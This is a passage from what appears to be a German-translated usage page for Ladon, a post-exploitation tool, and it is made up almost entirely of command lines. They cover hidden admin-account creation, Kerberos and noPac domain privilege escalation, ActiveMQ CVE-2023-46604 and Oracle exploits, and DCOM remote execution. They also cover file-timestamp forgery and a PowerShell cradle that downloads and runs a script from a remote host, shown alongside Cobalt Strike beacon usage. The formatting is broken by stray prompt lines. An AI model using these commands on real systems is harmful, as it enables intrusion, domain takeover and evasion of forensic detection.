244 API-Benutzer hinzufügen (ignoriert System net, net1.exe Deaktivierung)```Bash

Ladon AddUser admin$ 123456

root@kitploit:~
##### 245 API Benutzer löschen (ignoriert System net, net1.exe Deaktivierung)```Bash	
Ladon DelUser admin$
246 Rubeus Domain-Penetration Kerberos-Angriffe

Z.B. TGT-Anfragen/ST-Anfragen/AS-REP Roasting/Kerberoasting/Delegationsangriffe/Golden Ticket/Silver Ticket/Diamond Ticket/Sapphire Ticket usw.```Bash Ladon Rubeus

root@kitploit:~
##### 247 noPac Domänen-Penetration Domänen-Privilegieneskalation CVE-2021-42287/CVE-2021-42278```Bash	
CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter

/domain /user /pass argument needed for scanning
/dc /mAccount /nPassword argument needed for exploitation

Examples:
  Ladon.exe noPac scan -domain htb.local -user domain_user -pass 'Password123!'
  Ladon.exe noPac -dc dc02.htb.local -mAccount demo -mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo /mPassword Password123!
  Ladon.exe noPac -domain htb.local -user domain_user -pass 'Password123!' /dc dc02.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
248 SharpGPOAbuse```Bash

Ladon SharpGPOAbuse

root@kitploit:~
##### 249 SharpSphere interagiert mit dem Gastbetriebssystem von vCenter-verwalteten virtuellen Maschinen und führt Befehle aus```Bash	
Ladon SharpSphere

  No verb selected.

  dump        Snapshot and download memory dump file

  list        List all VMs managed by this vCenter

  execute     Execute given command in target VM

  c2          Run C2 using C3's VMwareShareFile module

  upload      Upload file to target VM

  download    Download file from target VM

  help        Display more information on a specific command.

  version     Display version information.
250 Dcom Remote-Befehlsausführung von MMC20```Bash

Ladon MmcExec host cmdline Ladon MmcExec 127.0.0.1 calc Ladon MmcExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 251 Dcom Remote-Befehlsausführung über ShellWindows```Bash	
Ladon ShellExec host cmdline
Ladon ShellExec 127.0.0.1 calc
Ladon ShellExec 127.0.0.1 Y2FsYw==
252 Dcom Remote-Befehlsausführung mittels ShellBrowserWindow```Bash

Ladon ShellBrowserExec host cmdline Ladon ShellBrowserExec 127.0.0.1 calc Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==

root@kitploit:~
##### 253 Smtp Ntlm Erkennung von Systeminformationen (Port 25, 465, 587)```Bash	
Ladon 192.168.1.8/24 SmtpInfo
254 HTTP/S Ntlm-Erkennungssysteminformation```Bash

Ladon 192.168.1.8/24 HttpInfo

root@kitploit:~
##### 255 ActiveMQ CVE-2023-46604 RCE Exploit```Bash	
Ladon CVE-2023-46604 -i 192.168.1.8 -u http://192.168.1.1/poc.xml
256 DomainLog DomainUserIP Remote-Abfrage der Domänenbenutzer-IP```Bash
root@kitploit:~
   Ladon DomainLog -d 7
   Ladon DomainLog -h ip -d 7
   Ladon DomainLog -h ip -d 7 -grep user
   Ladon DomainLog -h ip -u username -p password -d 7
   Ladon DomainLog -h ip -u username -p password -d 7 -all
   Ladon DomainLog -h ip -u username -p password -d 7 -f user -o C:\path\res

ult.txt

root@kitploit:~
##### 257 Prüfen, ob der Benutzer ein Lotus-Administrator ist```Bash	
Ladon LotusAdmin http://192.168.1.1
Ladon LotusAdmin http://192.168.1.1/adm.nsf
258 HTA-Server Ein-Klick-Start: auch beim Zugriff auf DOC wird HTA ausgeführt```Bash

Ladon HtaSer Ladon HtaSer 8080

root@kitploit:~
##### 259 ConfVer ConfluenceVer erkennt Confluence-Version```Bash	
Ladon 192.168.1.8/24 ConfVer
Ladon http://192.168.1.8:8080 ConfVer
Ladon url.txt ConfVer
260 FindAD kann verwendet werden, um den Ort von Active Directory-Benutzeranmeldungen zu finden und Domänenbenutzer aufzulisten```Bash

Ladon FindAD Ladon pveFindADUser

root@kitploit:~
##### 261 Oracle Datenbank Remote-Privilegien-Eskalationstool Offizieller Treiber >=.net 4.8```Bash	
Ladon OracleCmd2 192.168.1.8 1521 orcl admin 123456 whoami
262 Oracle-Datenbank-Remote-Privilegien-Eskalations-Tool 3 Methoden zur einmaligen Eskalation```Bash

Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m1 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m2 whoami Ladon OracleCmd 192.168.1.8 1521 orcl admin 123456 m3 whoami

root@kitploit:~
##### BuildCS Dynamisches Kompilieren von c#-Code-Dateien```Bash	
Ladon BuildCS exe.cs exe
Ladon BuildCS dll.cs dll
Ladon BuildCS exe.cs dat
Dateizeit ändern und festlegen

Verwendung: Ladon UpdateFileTime <file_path> ```Bash Ladon UpdateFileTime E:\Ladon911\Ladon.exe "2024-09-11 09:11:00"

root@kitploit:~
##### Dateizeit ändern Dateizeit kopieren```Bash
Ladon CopyFileTime E:\Ladon911\LadonExp.exe E:\Ladon911\Ladon.exe

PowerShell-Version Ladon.ps1

0x001 Cmd-Interaktive Ausführung```Bash

powershell Import-Module .\Ladon.ps1 Ladon OnlinePC

root@kitploit:~
#### 0x002 Lokale nicht-interaktive Ausführung```Bash	
powershell -exec bypass Import-Module .\Ladon.ps1;Ladon whoami
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass Import-Module .\Ladon.ps1;Ladon whoami

0x003 Remote-Speicherladen und Ausführen```Bash

powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"

root@kitploit:~
#### 0x004 Bypass PowerShell-Standardrichtlinie umgehen```Bash	
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon OnlinePC

0x005 Benutzerdefinierter Port-Scan```Bash

powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
### Cobalt Strike  Ladon.ps1

CS Beacon - Erkennung aktiver Hosts```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon ICMP
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon NbtInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon SmbInfo
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon LdapInfo

CS Beacon benutzerdefinierter Port-Scan```bash shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon PortScan '22,80,135,445'

root@kitploit:~
CS Beacon MS17010 Schwachstellenerkennung```bash
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon 192.168.1.1/24 ms17010

Beispiel

http://k8gege.org/Ladon/example-en.html

Neueste Version

Neueste Version in small seal ring: http://k8gege.org/Ladon/update.txt

Stargazer im Zeitverlauf

Stargazer im Zeitverlauf

Tool herunterladen